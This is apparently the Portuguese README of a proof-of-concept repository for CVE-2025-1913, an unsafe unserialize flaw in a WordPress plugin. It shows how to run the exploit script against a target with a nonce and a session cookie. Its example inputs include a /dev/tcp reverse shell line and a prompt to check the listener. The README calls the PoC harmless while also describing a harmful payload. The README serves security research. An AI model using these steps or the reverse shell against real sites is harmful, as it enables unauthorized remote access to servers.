
Um PoC demonstrando CVE-2025-1913, mostrando como o manuseio inseguro de unserialize do plugin pode levar a comportamento de alto impacto em ambientes controlados. Contém um payload prejudicial apenas para testes autorizados. Use estritamente em laboratórios isolados e para pesquisa defensiva.
Este repositório contém uma Prova de Conceito (PoC) apenas educacional para CVE-2025-1913, criada por Suhaib518 🇸🇦. Esta PoC demonstra como uma entrada PHP serializada especialmente manipulada pode acionar lógica vulnerável em componentes afetados do WordPress. A PoC é segura e não inclui cargas maliciosas.
⚠️ Aviso: Esta PoC é apenas para aprendizado, pesquisa e testes de segurança defensiva. NÃO a use em servidores que você não possui ou para os quais não tem permissão explícita para testar.
A vulnerabilidade existe devido ao tratamento inseguro de dados PHP serializados em certos fluxos de trabalho de plugins do WordPress. Esta PoC mostra como um atacante poderia fornecer estruturas serializadas manipuladas que causam comportamento interno não intencional.
Este repositório inclui um script Python que:
.
├── CVE-2025-1913-PoC.py # O script PoC criado por Suhaib518 KSA
└── README.md # Documentação
O script usa apenas módulos Python internos, exceto requests:
pip install requests
python3 exploit.py \
-c "Class" \
-H "https://target.com" \
--wp-nonce "1234567890" \
--cookie "wordpress_logged_in=YOUR_COOKIE_HERE"
Você será questionado:
O script então as serializará, construirá uma requisição WordPress e a enviará.
Abaixo está um exemplo de comando demonstrando o uso com valores de exemplo (estes não são maliciosos, apenas mostram o processo):
python3 exploit.py -c "WP_User_Query" -H "https://example.com" --wp-nonce "89f1a2b3c4" --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"
Exemplos de respostas para as perguntas interativas:
[?] Quantas propriedades esta classe possui? 2
[?] Nome da propriedade #1: file
[?] Valor para 'file': shell.sh
[?] Nome da propriedade #2: shell
[?] Valor para 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1
O script então exibirá:
[*] Sending request…
....Check the listener for the shell.
unserialize() em entradas não confiáveisLicença MIT.
Criado por Suhaib518 🇸🇦.